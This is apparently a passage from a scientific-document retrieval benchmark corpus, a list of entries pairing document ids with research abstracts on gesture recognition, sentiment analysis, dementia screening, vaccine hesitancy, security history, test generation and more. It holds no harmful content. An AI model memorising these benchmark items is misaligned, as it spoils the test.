"text": "The present thesis is concerned with the development and evaluation (in terms of accuracy and utility) of systems using hand postures and hand gestures for enhanced Human-Computer Interaction (HCI). In our case, these systems are based on vision techniques, thus only requiring cameras, and no other specific sensors or devices. When dealing with hand movements, it is necessary to distinguish two aspects of these hand movements : the static aspect and the dynamic aspect. The static aspect is characterized by a pose or configuration of the hand in an image and is related to the Hand Posture Recognition (HPR) problem. The dynamic aspect is defined either by the trajectory of the hand, or by a series of hand postures in a sequence of images. This second aspect is related to the Hand Gesture Recognition (HGR) task. Given the recognized lack of common evaluation databases in the HGR field, a first contribution of this thesis was the collection and public distribution of two databases, containing both oneand two-handed gestures, which part of the results reported here will be based upon. On these databases, we compare two state-of-the-art models for the task of HGR. As a second contribution, we propose a HPR technique based on a new feature extraction. This method has the advantage of being faster than conventional methods while yielding good performances. In addition, we provide comparison results of this method with other state-of-the-art technique. Finally, the most important contribution of this thesis lies in the thorough study of the state-of-the-art not only in HGR and HPR but also more generally in the field of HCI. The first chapter of the thesis provides an extended study of the state-of-the-art. The second chapter of this thesis contributes to HPR. We propose to apply for HPR a technique employed with success for face detection. This method is based on the Modified Census Transform (MCT) to extract relevant features in images. We evaluate this technique on an existing benchmark database and provide comparison results with other state-of-the-art approaches. The third chapter is related to HGR. In this chapter we describe the first recorded database, containing both oneand two-handed gestures in the 3D space. We propose to compare two models used with success in HGR, namely Hidden Markov Models (HMM) and Input-Output Hidden Markov Model (IOHMM). The fourth chapter is also focused on HGR but more precisely on two-handed gesture recognition. For that purpose, a second database has been recorded using two cameras. The goal of these gestures is to manipulate virtual objects on a screen. We propose to investigate on this second database the state-of-the-art sequence processing techniques we used in the previous chapter. We then discuss the results obtained using different features, and using images of one or two cameras. In conclusion, we propose a method for HPR based on new feature extraction. For HGR, we provide two databases and comparison results of two major sequence processing techniques. Finally, we present a complete survey on recent state-of-the-art techniques for both HPR and HGR. We also present some possible applications of these techniques, applied to two-handed gesture interaction. We hope this research will open new directions in the field of hand posture and gesture recognition.",
"title": ""
},
{
"docid": "8954672b2e2b6351abfde0747fd5d61c",
"text": "Sentiment Analysis (SA), an application of Natural Language processing (NLP), has been witnessed a blooming interest over the past decade. It is also known as opinion mining, mood extraction and emotion analysis. The basic in opinion mining is classifying the polarity of text in terms of positive (good), negative (bad) or neutral (surprise). Mood Extraction automates the decision making performed by human. It is the important aspect for capturing public opinion about product preferences, marketing campaigns, political movements, social events and company strategies. In addition to sentiment analysis for English and other European languages, this task is applied on various Indian languages like Bengali, Hindi, Telugu and Malayalam. This paper describes the survey on main approaches for performing sentiment extraction.",
"title": ""
},
{
"docid": "9a68a804863b5cfd2a271518c3d360ef",
"text": "Clinicians whose practice includes elderly patients need a short, reliable instrument to detect the presence of intellectual impairment and to determine the degree. A 10-item Short Portable Mental Status Questionnaire (SPMSQ), easily administered by any clinician in the office or in a hospital, has been designed, tested, standardized and validated. The standardization and validation procedure included administering the test to 997 elderly persons residing in the community, to 141 elderly persons referred for psychiatric and other health and social problems to a multipurpose clinic, and to 102 elderly persons living in institutions such as nursing homes, homes for the aged, or state mental hospitals. It was found that educational level and race had to be taken into account in scoring individual performance. On the basis of the large community population, standards of performance were established for: 1) intact mental functioning, 2) borderline or mild organic impairment, 3) definite but moderate organic impairment, and 4) severe organic impairment. In the 141 clinic patients, the SPMSQ scores were correlated with the clinical diagnoses. There was a high level of agreement between the clinical diagnosis of organic brain syndrome and the SPMSQ scores that indicated moderate or severe organic impairment.",
"title": ""
},
{
"docid": "2bf0219394d87654d2824c805844fcaa",
"text": "Wei-yu Kevin Chiang • Dilip Chhajed • James D. Hess Department of Information Systems, University of Maryland at Baltimore County, Baltimore, Maryland 21250 Department of Business Administration, University of Illinois at Urbana–Champaign, Champaign, Illinois 61820 Department of Business Administration, University of Illinois at Urbana–Champaign, Champaign, Illinois 61820 kevin@wchiang.net • chhajed@uiuc.edu • jhess@uiuc.edu",
"title": ""
},
{
"docid": "e49369808eecc67d10f4084245e25163",
"text": "In recent years, the recognition of activity is a daring task which helps elderly people, disabled patients and so on. The aim of this paper is to design a system for recognizing the human activity in egocentric video. In this research work, the various textural features like gray level co-occurrence matrix and local binary pattern and point feature speeded up robust features are retrieved from activity videos which is a proposed work and classifiers like probabilistic neural network, support vector machine (SVM), k nearest neighbor (kNN) and proposed SVM+kNN classifiers are used to classify the activity. Here, multimodal egocentric activity dataset is chosen as input. The performance results showed that the SVM+kNN classifier outperformed other classifiers.",
"title": ""
},
{
"docid": "6a851f4fdd456dbaef547a63d53c7a5a",
"text": "In the 20th century, the introduction of multiple vaccines significantly reduced childhood morbidity, mortality, and disease outbreaks. Despite, and perhaps because of, their public health impact, an increasing number of parents and patients are choosing to delay or refuse vaccines. These individuals are described as \"vaccine hesitant.\" This phenomenon has developed due to the confluence of multiple social, cultural, political, and personal factors. As immunization programs continue to expand, understanding and addressing vaccine hesitancy will be crucial to their successful implementation. This review explores the history of vaccine hesitancy, its causes, and suggested approaches for reducing hesitancy and strengthening vaccine acceptance.",
"title": ""
},
{
"docid": "62d1574e23fcf07befc54838ae2887c1",
"text": "Digital images are widely used and numerous application in different scientific fields use digital image processing algorithms where image segmentation is a common task. Thresholding represents one technique for solving that task and Kapur's and Otsu's methods are well known criteria often used for selecting thresholds. Finding optimal threshold values represents a hard optimization problem and swarm intelligence algorithms have been successfully used for solving such problems. In this paper we adjusted recent elephant herding optimization algorithm for multilevel thresholding by Kapur's and Otsu's method. Performance was tested on standard benchmark images and compared with four other swarm intelligence algorithms. Elephant herding optimization algorithm outperformed other approaches from literature and it was more robust.",
"title": ""
},
{
"docid": "76092028b6d109c5e73521d796643eb0",
"text": "Volume raycasting techniques are important for both visual arts and visualization. They allow efficient generation of visual effects and visualization of scientific data obtained by tomography or numerical simulation. Volume-rendering techniques are also effective for direct rendering of implicit surfaces used for soft-body animation and constructive solid geometry. The focus of this course is on volumetric illumination techniques that approximate physically based light transport in participating media. Such techniques include interactive implementation of soft and hard shadows, ambient occlusion, and simple Monte Carlo-based approaches to global illumination, including translucency and scattering.",
"title": ""
},
{
"docid": "3744970293b3ed4c4543e6f2313fe2e4",
"text": "With the proliferation of GPS-enabled smart devices and increased availability of wireless network, spatial crowdsourcing (SC) has been recently proposed as a framework to automatically request workers (i.e., smart device carriers) to perform location-sensitive tasks (e.g., taking scenic photos, reporting events). In this paper we study a destination-aware task assignment problem that concerns the optimal strategy of assigning each task to proper worker such that the total number of completed tasks can be maximized whilst all workers can reach their destinations before deadlines after performing assigned tasks. Finding the global optimal assignment turns out to be an intractable problem since it does not imply optimal assignment for individual worker. Observing that the task assignment dependency only exists amongst subsets of workers, we utilize tree-decomposition technique to separate workers into independent clusters and develop an efficient depth-first search algorithm with progressive bounds to prune non-promising assignments. Our empirical studies demonstrate that our proposed technique is quite effective and settle the problem nicely.",
"title": ""
},
{
"docid": "849ae444bca6edc7b5d81c0b5c8e2f90",
"text": "This paper develops an electric vehicle switched-reluctance motor (SRM) drive powered by a battery/supercapacitor having grid-to-vehicle (G2V) and vehicle-to-home (V2H)/vehicle-to-grid (V2G) functions. The power circuit of the motor drive is formed by a bidirectional two-quadrant front-end dc/dc converter and an SRM asymmetric bridge converter. Through proper control and setting of key parameters, good acceleration/deceleration, reversible driving, and braking characteristics are obtained. In idle condition, the proposed motor drive schematic can be rearranged to construct the integrated power converter to perform the following functions: 1) G2V charging mode: a single-phase two-stage switch-mode rectifier based charger is formed with power factor correction capability; 2) autonomous V2H discharging mode: the 60-Hz 220-V/110-V ac sources are generated by the developed single-phase three-wire inverter to power home appliances. Through the developed differential mode and common mode control schemes, well-regulated output voltages are achieved; 3) grid-connected V2G discharging mode: the programmed real power can be sent back to the utility grid.",
"title": ""
},
{
"docid": "2c37ee67205320d54149a71be104c0e1",
"text": "This talk will review the mission, activities, and recommendations of the Blue Ribbon Panel on Cyberinfrastructure recently appointed by the leadership on the U.S. National Science Foundation (NSF). The NSF invests in people, ideas, and tools and in particular is a major investor in basic research to produce communication and information technology (ICT) as well as its use in supporting basic research and education in most all areas of science and engineering. The NSF through its Directorate for Computer and Information Science and Engineering (CISE) has provided substantial funding for high-end computing resources, initially by awards to five supercomputer centers and later through $70 M per year investments in two partnership alliances for advanced computation infrastructures centered at the University of Illinois and the University of California, San Diego. It has also invested in an array of complementary R&D initiatives in networking, middleware, digital libraries, collaboratories, computational and visualization science, and distributed terascale grid environments.",
"title": ""
},
{
"docid": "437ad5ac30619459627b8f76034da29d",
"text": "In 1986, this author presented a paper at a conference, giving a sampling of computer and network security issues, and the tools of the day to address them. The purpose of this current paper is to revisit the topic of computer and network security, and see what changes, especially in types of attacks, have been brought about in 30 years. This paper starts by presenting a review of the state of computer and network security in 1986, along with how certain facets of it have changed. Next, it talks about today's security environment, and finally discusses some of today's many computer and network attack methods that are new or greatly updated since 1986. Many references for further study are provided. The classes of attacks that are known today are the same as the ones known in 1986, but many new methods of implementing the attacks have been enabled by new technologies and the increased pervasiveness of computers and networks in today's society. The threats and specific types of attacks faced by the computer community 30 years ago have not gone away. New threat methods and attack vectors have opened due to advancing technology, supplementing and enhancing, rather than replacing the long-standing threat methods.",
"title": ""
},
{
"docid": "0a6a3e82b701bfbdbb73a9e8573fc94a",
"text": "Providing effective feedback on resource consumption in the home is a key challenge of environmental conservation efforts. One promising approach for providing feedback about residential energy consumption is the use of ambient and artistic visualizations. Pervasive computing technologies enable the integration of such feedback into the home in the form of distributed point-of-consumption feedback devices to support decision-making in everyday activities. However, introducing these devices into the home requires sensitivity to the domestic context. In this paper we describe three abstract visualizations and suggest four design requirements that this type of device must meet to be effective: pragmatic, aesthetic, ambient, and ecological. We report on the findings from a mixed methods user study that explores the viability of using ambient and artistic feedback in the home based on these requirements. Our findings suggest that this approach is a viable way to provide resource use feedback and that both the aesthetics of the representation and the context of use are important elements that must be considered in this design space.",
"title": ""
},
{
"docid": "5285b2b579c8a0f0915e76e41d66330c",
"text": "Not all bugs lead to program crashes, and not always is there a formal specification to check the correctness of a software test's outcome. A common scenario in software testing is therefore that test data are generated, and a tester manually adds test oracles. As this is a difficult task, it is important to produce small yet representative test sets, and this representativeness is typically measured using code coverage. There is, however, a fundamental problem with the common approach of targeting one coverage goal at a time: Coverage goals are not independent, not equally difficult, and sometimes infeasible-the result of test generation is therefore dependent on the order of coverage goals and how many of them are feasible. To overcome this problem, we propose a novel paradigm in which whole test suites are evolved with the aim of covering all coverage goals at the same time while keeping the total size as small as possible. This approach has several advantages, as for example, its effectiveness is not affected by the number of infeasible targets in the code. We have implemented this novel approach in the EvoSuite tool, and compared it to the common approach of addressing one goal at a time. Evaluated on open source libraries and an industrial case study for a total of 1,741 classes, we show that EvoSuite achieved up to 188 times the branch coverage of a traditional approach targeting single branches, with up to 62 percent smaller test suites.",
"title": ""
},
{
"docid": "2ffafb9e8c49d30b295a7047fe33268f",
"text": "The time-based resource-sharing model of working memory assumes that memory traces suffer from a time-related decay when attention is occupied by concurrent activities. Using complex continuous span tasks in which temporal parameters are carefully controlled, P. Barrouillet, S. Bernardin, S. Portrat, E. Vergauwe, & V. Camos (2007) recently provided evidence that any increase in time of the processing component of these tasks results in lower recall performance. However, K. Oberauer and R. Kliegl (2006) pointed out that, in this paradigm, increased processing times are accompanied by a corollary decrease of the remaining time during which attention is available to refresh memory traces. As a consequence, the main determinant of recall performance in complex span tasks would not be the duration of attentional capture inducing time-related decay, as Barrouillet et al. (2007) claimed, but the time available to repair memory traces, and thus would be compatible with an interference account of forgetting. The authors demonstrate here that even when the time available to refresh memory traces is kept constant, increasing the processing time still results in poorer recall, confirming that time-related decay is the source of forgetting within working memory.",
"title": ""
},
{
"docid": "8304686526c37e5d1e0e4e7708bf6c29",
"text": "JavaScript is becoming the de-facto programming language of the Web. Large-scale web applications (web apps) written in Javascript are commonplace nowadays, with big technology players (e.g., Google, Facebook) using it in their core flagship products. Today, it is common practice to reuse existing JavaScript code, usually in the form of third-party libraries and frameworks. If on one side this practice helps in speeding up development time, on the other side it comes with the risk of bringing dead code, i.e., JavaScript code which is never executed, but still downloaded from the network and parsed in the browser. This overhead can negatively impact the overall performance and energy consumption of the web app. In this paper we present Lacuna, an approach for JavaScript dead code elimination, where existing JavaScript analysis techniques are applied in combination. The proposed approach supports both static and dynamic analyses, it is extensible, and independent of the specificities of the used JavaScript analysis techniques. Lacuna can be applied to any JavaScript code base, without imposing any constraints to the developer, e.g., on her coding style or on the use of some specific JavaScript feature (e.g., modules). Lacuna has been evaluated on a suite of 29 publicly-available web apps, composed of 15,946 JavaScript functions, and built with different JavaScript frameworks (e.g., Angular, Vue.js, jQuery). Despite being a prototype, Lacuna obtained promising results in terms of analysis execution time and precision.",
"title": ""
},
{
"docid": "7f897e5994685f0b158da91cef99c855",
"text": "Cloud computing and its pay-as-you-go model continue to provide significant cost benefits and a seamless service delivery model for cloud consumers. The evolution of small-scale and large-scale geo-distributed datacenters operated and managed by individual cloud service providers raises new challenges in terms of effective global resource sharing and management of autonomously-controlled individual datacenter resources. Earlier solutions for geo-distributed clouds have focused primarily on achieving global efficiency in resource sharing that results in significant inefficiencies in local resource allocation for individual datacenters leading to unfairness in revenue and profit earned. In this paper, we propose a new contracts-based resource sharing model for federated geo-distributed clouds that allows cloud service providers to establish resource sharing contracts with individual datacenters apriori for defined time intervals during a 24 hour time period. Based on the established contracts, individual cloud service providers employ a cost-aware job scheduling and provisioning algorithm that enables tasks to complete and meet their response time requirements. The proposed techniques are evaluated through extensive experiments using realistic workloads and the results demonstrate the effectiveness, scalability and resource sharing efficiency of the proposed model.",
"title": ""
},
{
"docid": "e35194cb3fdd3edee6eac35c45b2da83",
"text": "The availability of high-resolution Digital Surface Models of coastal environments is of increasing interest for scientists involved in the study of the coastal system processes. Among the range of terrestrial and aerial methods available to produce such a dataset, this study tests the utility of the Structure from Motion (SfM) approach to low-altitude aerial imageries collected by Unmanned Aerial Vehicle (UAV). The SfM image-based approach was selected whilst searching for a rapid, inexpensive, and highly automated method, able to produce 3D information from unstructured aerial images. In particular, it was used to generate a dense point cloud and successively a high-resolution Digital Surface Models (DSM) of a beach dune system in Marina di Ravenna (Italy). The quality of the elevation dataset produced by the UAV-SfM was initially evaluated by comparison with point cloud generated by a Terrestrial Laser Scanning (TLS) surveys. Such a comparison served to highlight an average difference in the vertical values of 0.05 m (RMS = 0.19 m). However, although the points cloud comparison is the best approach to investigate the absolute or relative correspondence between UAV and TLS OPEN ACCESS Remote Sens. 2013, 5 6881 methods, the assessment of geomorphic features is usually based on multi-temporal surfaces analysis, where an interpolation process is required. DSMs were therefore generated from UAV and TLS points clouds and vertical absolute accuracies assessed by comparison with a Global Navigation Satellite System (GNSS) survey. The vertical comparison of UAV and TLS DSMs with respect to GNSS measurements pointed out an average distance at cm-level (RMS = 0.011 m). The successive point by point direct comparison between UAV and TLS elevations show a very small average distance, 0.015 m, with RMS = 0.220 m. Larger values are encountered in areas where sudden changes in topography are present. The UAV-based approach was demonstrated to be a straightforward one and accuracy of the vertical dataset was comparable with results obtained by TLS technology.",
"title": ""
}
] | scidocsrr |
de19ac7723243947167a0532de5f142a | A Sub-nW Multi-stage Temperature Compensated Timer for Ultra-Low-Power Sensor Nodes | [
{
"docid": "bb542460bf9196ef1905cecdce252bf3",
"text": "Wireless sensor nodes have many compelling applications such as smart buildings, medical implants, and surveillance systems. However, existing devices are bulky, measuring >;1cm3, and they are hampered by short lifetimes and fail to realize the “smart dust” vision of [1]. Smart dust requires a mm3-scale, wireless sensor node with perpetual energy harvesting. Recently two application-specific implantable microsystems [2][3] demonstrated the potential of a mm3-scale system in medical applications. However, [3] is not programmable and [2] lacks a method for re-programming or re-synchronizing once encapsulated. Other practical issues remain unaddressed, such as a means to protect the battery during the time period between system assembly and deployment and the need for flexible design to enable use in multiple application domains.",
"title": ""
}
] | [
{
"docid": "b85a6286ca2fb14a9255c9d70c677de3",
"text": "0140-3664/$ see front matter 2013 Elsevier B.V. All rights reserved. http://dx.doi.org/10.1016/j.comcom.2013.01.009 q The research leading to these results has been conducted in the SAIL project and received funding from the European Community’s Seventh Framework Program (FP7/2007-2013) under Grant Agreement No. 257448. ⇑ Corresponding author. Tel.: +49 5251 60 5385; fax: +49 5251 60 5377. E-mail addresses: cdannewitz@upb.de (C. Dannewitz), Dirk.Kutscher@neclab.eu (D. Kutscher), Borje.Ohlman@ericsson.com (B. Ohlman), stephen.farrell@cs.tcd.ie (S. Farrell), bengta@sics.se (B. Ahlgren), hkarl@upb.de (H. Karl). 1 <http://www.cisco.com/web/solutions/sp/vni/vni_mobile_forecast_highlights/ index.html>. Christian Dannewitz , Dirk Kutscher b,⇑, Börje Ohlman , Stephen Farrell , Bengt Ahlgren , Holger Karl a",
"title": ""
},
{
"docid": "4f84d3a504cf7b004a414346bb19fa94",
"text": "Abstract—The electric power supplied by a photovoltaic power generation systems depends on the solar irradiation and temperature. The PV system can supply the maximum power to the load at a particular operating point which is generally called as maximum power point (MPP), at which the entire PV system operates with maximum efficiency and produces its maximum power. Hence, a Maximum power point tracking (MPPT) methods are used to maximize the PV array output power by tracking continuously the maximum power point. The proposed MPPT controller is designed for 10kW solar PV system installed at Cape Institute of Technology. This paper presents the fuzzy logic based MPPT algorithm. However, instead of one type of membership function, different structures of fuzzy membership functions are used in the FLC design. The proposed controller is combined with the system and the results are obtained for each membership functions in Matlab/Simulink environment. Simulation results are decided that which membership function is more suitable for this system.",
"title": ""
},
{
"docid": "890f459384ea47a8915a60c19a3320e3",
"text": "Product ads are a popular form of search advertizing offered by major search engines, including Yahoo, Google and Bing. Unlike traditional search ads, product ads include structured product specifications, which allow search engine providers to perform better keyword-based ad retrieval. However, the level of completeness of the product specifications varies and strongly influences the performance of ad retrieval. On the other hand, online shops are increasing adopting semantic markup languages such as Microformats, RDFa and Microdata, to annotate their content, making large amounts of product description data publicly available. In this paper, we present an approach for enriching product ads with structured data extracted from thousands of online shops offering Microdata annotations. In our approach we use structured product ads as supervision for training feature extraction models able to extract attribute-value pairs from unstructured product descriptions. We use these features to identify matching products across different online shops and enrich product ads with the extracted data. Our evaluation on three product categories related to electronics show promising results in terms of enriching product ads with useful product data.",
"title": ""
},
{
"docid": "f4dc67d810d5f104f91c8724630992cf",
"text": "Apoptosis is deregulated in many cancers, making it difficult to kill tumours. Drugs that restore the normal apoptotic pathways have the potential for effectively treating cancers that depend on aberrations of the apoptotic pathway to stay alive. Apoptosis targets that are currently being explored for cancer drug discovery include the tumour-necrosis factor (TNF)-related apoptosis-inducing ligand (TRAIL) receptors, the BCL2 family of anti-apoptotic proteins, inhibitor of apoptosis (IAP) proteins and MDM2.",
"title": ""
},
{
"docid": "2579fe676b498cee60af8bda22d75e2e",
"text": "Only one late period is allowed for this homework (11:59pm 1/26). Submission instructions: These questions require thought but do not require long answers. Please be as concise as possible. You should submit your answers as a writeup in PDF format via GradeScope and code via the Snap submission site. Submitting writeup: Prepare answers to the homework questions into a single PDF file and submit it via http://gradescope.com. Make sure that the answer to each question is on a separate page. This means you should submit a 15-page PDF (1 page for the cover sheet, 1 page for the answers to question 1, 5 pages for answers to question 2, 3 pages for question 3, and 5 pages for question 4). On top of each page write the number of the question you are answering. Please find the cover sheet and the recommended templates located here: Not including the cover sheet in your submission will result in a 2-point penalty. Put all the code for a single question into a single file and upload it. Questions 1 MapReduce (25 pts) [Jeff/Sameep/Ivaylo] Write a MapReduce program in Hadoop that implements a simple \" People You Might Know \" social network friendship recommendation algorithm. The key idea is that if two people have a lot of mutual friends, then the system should recommend that they connect with each other.",
"title": ""
},
{
"docid": "e8f424ee75011e7cf9c2c3cbf5ea5037",
"text": "BACKGROUND\nEmotional distress is an increasing public health problem and Hatha yoga has been claimed to induce stress reduction and empowerment in practicing subjects. We aimed to evaluate potential effects of Iyengar Hatha yoga on perceived stress and associated psychological outcomes in mentally distressed women.\n\n\nMATERIAL/METHODS\nA controlled prospective non-randomized study was conducted in 24 self-referred female subjects (mean age 37.9+/-7.3 years) who perceived themselves as emotionally distressed. Subjects were offered participation in one of two subsequential 3-months yoga programs. Group 1 (n=16) participated in the first class, group 2 (n=8) served as a waiting list control. During the yoga course, subjects attended two-weekly 90-min Iyengar yoga classes. Outcome was assessed on entry and after 3 months by Cohen Perceived Stress Scale, State-Trait Anxiety Inventory, Profile of Mood States, CESD-Depression Scale, Bf-S/Bf-S' Well-Being Scales, Freiburg Complaint List and ratings of physical well-being. Salivary cortisol levels were measured before and after an evening yoga class in a second sample.\n\n\nRESULTS\nCompared to waiting-list, women who participated in the yoga-training demonstrated pronounced and significant improvements in perceived stress (P<0.02), State and Trait Anxiety (P<0.02 and P<0.01, respectively), well-being (P<0.01), vigor (P<0.02), fatigue (P<0.02) and depression (P<0.05). Physical well-being also increased (P<0.01), and those subjects suffering from headache or back pain reported marked pain relief. Salivary cortisol decreased significantly after participation in a yoga class (P<0.05).\n\n\nCONCLUSIONS\nWomen suffering from mental distress participating in a 3-month Iyengar yoga class show significant improvements on measures of stress and psychological outcomes. Further investigation of yoga with respect to prevention and treatment of stress-related disease and of underlying mechanism is warranted.",
"title": ""
},
{
"docid": "756b25456494b3ece9b240ba3957f91c",
"text": "In this paper we introduce the task of fact checking, i.e. the assessment of the truthfulness of a claim. The task is commonly performed manually by journalists verifying the claims made by public figures. Furthermore, ordinary citizens need to assess the truthfulness of the increasing volume of statements they consume. Thus, developing fact checking systems is likely to be of use to various members of society. We first define the task and detail the construction of a publicly available dataset using statements fact-checked by journalists available online. Then, we discuss baseline approaches for the task and the challenges that need to be addressed. Finally, we discuss how fact checking relates to mainstream natural language processing tasks and can stimulate further research.",
"title": ""
},
{
"docid": "941dc605dab6cf9bfe89bedb2b4f00a3",
"text": "Word boundary detection in continuous speech is very common and important problem in speech synthesis and recognition. Several researches are open on this field. Since there is no sign of start of the word, end of the word and number of words in the spoken utterance of any natural language, one must study the intonation pattern of a particular language. In this paper an algorithm is proposed to detect word boundaries in continuous speech of Hindi language. A careful study of the intonation pattern of Hindi language has been done. Based on this study it is observed that, there are several suprasegmental parameters of speech signal such as pitch, F0 fundamental frequency, duration, intensity, and pause, which can play important role in finding some clues to detect the start and the end of the word from the spoken utterance of Hindi Language. The proposed algorithm is based mainly on two prosodic parameters, pitch and intensity.",
"title": ""
},
{
"docid": "6d5998e5f0d5500493c7dc98c7fb28d9",
"text": "Coded structured light is an optical technique based on active stereovision which allows shape acquisition. By projecting a suitable set of light patterns onto the surface of an object and capturing images with a camera, a large number of correspondences can be found and 3D points can be reconstructed by means of triangulation. One-shot techniques are based on projecting an unique pattern so that moving objects can be measured. A major group of techniques in this field define coloured multi-slit or stripe patterns in order to obtain dense reconstructions. The former type of patterns is suitable for locating intensity peaks in the image while the latter is aimed to locate edges. In this paper, we present a new way to design coloured stripe patterns so that both intensity peaks and edges can be located without loss of accuracy and reducing the number of hue levels included in the pattern. The results obtained by the new pattern are quantitatively and qualitatively compared to similar techniques. These results also contribute to a comparison between the peak-based and edge-based reconstruction strategies. q 2005 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "ed0d234b961befcffab751f70f5c5fdb",
"text": "UNLABELLED\nA challenging aspect of managing patients on venoarterial extracorporeal membrane oxygenation (V-A ECMO) is a thorough understanding of the relationship between oxygenated blood from the ECMO circuit and blood being pumped from the patient's native heart. We present an adult V-A ECMO case report, which illustrates a unique encounter with the concept of \"dual circulations.\" Despite blood gases from the ECMO arterial line showing respiratory acidosis, this patient with cardiogenic shock demonstrated regional respiratory alkalosis when blood was sampled from the right radial arterial line. In response, a sample was obtained from the left radial arterial line, which mimicked the ECMO arterial blood but was dramatically different from the blood sampled from the right radial arterial line. A retrospective analysis of patient data revealed that the mismatch of blood gas values in this patient corresponded to an increased pulse pressure. Having three arterial blood sampling sites and data on the patient's pulse pressure provided a dynamic view of blood mixing and guided proper management, which contributed to a successful patient outcome that otherwise may not have occurred. As a result of this unique encounter, we created and distributed graphics representing the concept of \"dual circulations\" to facilitate the education of ECMO specialists at our institution.\n\n\nKEYWORDS\nECMO, education, cardiopulmonary bypass, cannulation.",
"title": ""
},
{
"docid": "5aed6d1cd0036384fd09a5c5a72a9020",
"text": "We propose a method of representing audience behavior through facial and body motions from a single video stream, and use these features to predict the rating for feature-length movies. This is a very challenging problem as: i) the movie viewing environment is dark and contains views of people at different scales and viewpoints; ii) the duration of feature-length movies is long (80-120 mins) so tracking people uninterrupted for this length of time is still an unsolved problem; and iii) expressions and motions of audience members are subtle, short and sparse making labeling of activities unreliable. To circumvent these issues, we use an infrared illuminated test-bed to obtain a visually uniform input. We then utilize motion-history features which capture the subtle movements of a person within a pre-defined volume, and then form a group representation of the audience by a histogram of pair-wise correlations over a small-window of time. Using this group representation, we learn our movie rating classifier from crowd-sourced ratings collected by rottentomatoes.com and show our prediction capability on audiences from 30 movies across 250 subjects (> 50 hrs).",
"title": ""
},
{
"docid": "865ca372a2b073e672c535a94c04c2ad",
"text": "The work presented here involves the design of a Multi Layer Perceptron (MLP) based pattern classifier for recognition of handwritten Bangla digits using a 76 element feature vector. Bangla is the second most popular script and language in the Indian subcontinent and the fifth most popular language in the world. The feature set developed for representing handwritten Bangla numerals here includes 24 shadow features, 16 centroid features and 36 longest-run features. On experimentation with a database of 6000 samples, the technique yields an average recognition rate of 96.67% evaluated after three-fold cross validation of results. It is useful for applications related to OCR of handwritten Bangla Digit and can also be extended to include OCR of handwritten characters of Bangla alphabet.",
"title": ""
},
{
"docid": "3188d901ab997dcabc795ad3da6af659",
"text": "This paper is about detecting incorrect arcs in a dependency parse for sentences that contain grammar mistakes. Pruning these arcs results in well-formed parse fragments that can still be useful for downstream applications. We propose two automatic methods that jointly parse the ungrammatical sentence and prune the incorrect arcs: a parser retrained on a parallel corpus of ungrammatical sentences with their corrections, and a sequence-to-sequence method. Experimental results show that the proposed strategies are promising for detecting incorrect syntactic dependencies as well as incorrect semantic dependencies.",
"title": ""
},
{
"docid": "b2ad81e0c7e352dac4caea559ac675bb",
"text": "A linearly polarized miniaturized printed dipole antenna with novel half bowtie radiating arm is presented for wireless applications including the 2.4 GHz ISM band. This design is approximately 0.363 λ in length at central frequency of 2.97 GHz. An integrated balun with inductive transitions is employed for wideband impedance matching without changing the geometry of radiating arms. This half bowtie dipole antenna displays 47% bandwidth, and a simulated efficiency of over 90% with miniature size. The radiation patterns are largely omnidirectional and display a useful level of measured gain across the impedance bandwidth. The size and performance of the miniaturized half bowtie dipole antenna is compared with similar reduced size antennas with respect to their overall footprint, substrate dielectric constant, frequency of operation and impedance bandwidth. This half bowtie design in this communication outperforms the reference antennas in virtually all categories.",
"title": ""
},
{
"docid": "7fc35d2bb27fb35b5585aad8601a0cbd",
"text": "We introduce Anita: a flexible and intelligent Text Adaptation tool for web content that provides Text Simplification and Text Enhancement modules. Anita’s simplification module features a state-of-the-art system that adapts texts according to the needs of individual users, and its enhancement module allows the user to search for a word’s definitions, synonyms, translations, and visual cues through related images. These utilities are brought together in an easy-to-use interface of a freely available web browser extension.",
"title": ""
},
{
"docid": "319ba1d449d2b65c5c58b5cc0fdbed67",
"text": "This paper introduces a new technology and tools from the field of text-based information retrieval. The authors have developed – a fingerprint-based method for a highly efficient near similarity search, and – an application of this method to identify plagiarized passages in large document collections. The contribution of our work is twofold. Firstly, it is a search technology that enables a new quality for the comparative analysis of complex and large scientific texts. Secondly, this technology gives rise to a new class of tools for plagiarism analysis, since the comparison of entire books becomes computationally feasible. The paper is organized as follows. Section 1 gives an introduction to plagiarism delicts and related detection methods, Section 2 outlines the method of fuzzy-fingerprints as a means for near similarity search, and Section 3 shows our methods in action: It gives examples for near similarity search as well as plagiarism detection and discusses results from a comprehensive performance analyses. 1 Plagiarism Analysis Plagiarism is the act of claiming to be the author of material that someone else actually wrote (Encyclopædia Britannica 2005), and, with the ubiquitousness",
"title": ""
},
{
"docid": "76eef8117ac0bc5dbb0529477d10108d",
"text": "Most existing switched-capacitor (SC) DC-DC converters only offer a few voltage conversion ratios (VCRs), leading to significant efficiency fluctuations under wide input/output dynamics (e.g. up to 30% in [1]). Consequently, systematic SC DC-DC converters with fine-grained VCRs (FVCRs) become attractive to achieve high efficiency over a wide operating range. Both the Recursive SC (RSC) [2,3] and Negator-based SC (NSC) [4] topologies offer systematic FVCR generations with high conductance, but their binary-switching nature fundamentally results in considerable parasitic loss. In bulk CMOS, the restriction of using low-parasitic MIM capacitors for high efficiency ultimately limits their achievable power density to <1mW/mm2. This work reports a fully integrated fine-grained buck-boost SC DC-DC converter with 24 VCRs. It features an algorithmic voltage-feed-in (AVFI) topology to systematically generate any arbitrary buck-boost rational ratio with optimal conduction loss while achieving the lowest parasitic loss compared with [2,4]. With 10 main SC cells (MCs) and 10 auxiliary SC cells (ACs) controlled by the proposed reference-selective bootstrapping driver (RSBD) for wide-range efficient buck-boost operations, the AVFI converter in 65nm bulk CMOS achieves a peak efficiency of 84.1% at a power density of 13.2mW/mm2 over a wide range of input (0.22 to 2.4V) and output (0.85 to 1.2V).",
"title": ""
},
{
"docid": "5f8a8117ff153528518713d66c876228",
"text": "Certain human talents, such as musical ability, have been associated with left-right differences in brain structure and function. In vivo magnetic resonance morphometry of the brain in musicians was used to measure the anatomical asymmetry of the planum temporale, a brain area containing auditory association cortex and previously shown to be a marker of structural and functional asymmetry. Musicians with perfect pitch revealed stronger leftward planum temporale asymmetry than nonmusicians or musicians without perfect pitch. The results indicate that outstanding musical ability is associated with increased leftward asymmetry of cortex subserving music-related functions.",
"title": ""
},
{
"docid": "66a6e9bbdd461fa85a0a09ec1ceb2031",
